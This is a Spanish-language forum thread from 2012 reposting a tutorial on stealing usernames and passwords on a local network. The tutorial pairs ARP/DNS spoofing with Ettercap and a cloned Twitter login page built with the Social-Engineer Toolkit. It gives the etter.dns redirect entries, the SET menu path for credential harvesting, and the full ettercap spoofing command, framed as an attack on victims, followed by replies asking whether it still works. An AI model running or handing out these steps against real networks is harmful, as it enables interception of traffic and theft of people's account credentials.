Olfateando Passwords con Ettercap

Iniciado por REC, Mayo 25, 2012, 03:04:58 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mayo 25, 2012, 03:04:58 PM Ultima modificación: Agosto 08, 2014, 09:18:59 PM por Expermicid

Olfateando Passwords con Ettercap por Intruder-T23

Introducción:
Este tipo de ataque consiste en envenenar el DNS de una red LAN. Cuando alguien de la intranet entra en algún website (en su navegador la víctima coloca la página web exactamente como es, por ejemplo, este coloca "www.twitter.com") e introduce su nombre de usuario y password, esta información llega a la computadora del atacante, quien se encuentra olfateando la red.

Datos Basicos:
Distro: Backtrack 5
Herramientas: Ettercap y SET (Social-Engineer Toolkit).
Tipo de Ataque: Olfateo y Envenenamiento de DNS (DNS Poisoning).
Resultados Obtenidos: Nombre de usuario y password.

Configurando etter:
En la terminal, se teclean los siguientes comandos:

CitarA. ifconfig
B. locate etter.dns
C. nano /usr/local/share/ettercap/etter.dns


Descripción de comandos:
A. Se teclea "ifconfig" para ver la dirección IP local de la computadora atacante, la cual es 192.168.1.104. También se ve la interfaz de la tarjeta wireless, la cual es wlan0.
B. Se teclea "locate etter.dns" para localizar el directorio del archivo etter.dns.
C. Se usa el comando "nano" mas el directorio del archivo etter.dns para así poder editarlo.

Archivo Etter.dns:
Aquí se añaden las siguientes líneas:
Citartwitter.com       A 192.168.1.104
*.twitter.com     A 192.168.1.104
www.twitter.com   A 192.168.1.104
 

Twitter.com es el website donde la víctima introducirá su nombre de usuario y password. Como pueden ver, también hay que introducir la dirección IP de la PC atacante. Una vez que se llenan los datos, para guardar los cambios se debe teclear lo siguiente: "control+x" (Ctrl más la tecla x), luego se teclea "y", y finalmente "enter".

Social-Engineer Toolkit (SET):

Después de realizar los cambios en el archivo etter.dns, se teclea el símbolo del dragón para ir a: Backtrack>>Explotation Tools>>Social Engineering Tools>>set

Dentro de SET, se teclea:
1) Social Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

Dentro de SET, se coloca el website y queda de la siguiente forma:

CitarEnter the url to clone: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y se teclea la tecla enter para dejar el website falso corriendo en el puerto 80...

Ettercap:
En la consola, se teclea:

Citarettercap -T -q -l wlan0 -P dns_spoof -M arp // //

Finalmente, cuando la víctima entra a la página web e introduce su nombre de usuario y password, la información llega a la computadora del atacante. En el video, el nombre de usuario es "internaut" y el password es "password123".

Descarga del Video Tutorial de buena calidad:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Mala calidad :(








Fuente : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


sa sa sa ludos  ;D
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

aun sirve el dns spoof?
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás"

Citaraun sirve el dns spoof?

Hola, pues el vídeo fue lanzado resien el 15/05/2012  con el post .  (aunque bro seria divertido si lo intentases y nos cuentes como te fue )  salu2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

m claro lo intente pero no funciona no pasa nada en el ethercap me sale que esta redirecionando pero entreo al navegador y no pasa nada xD"
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás"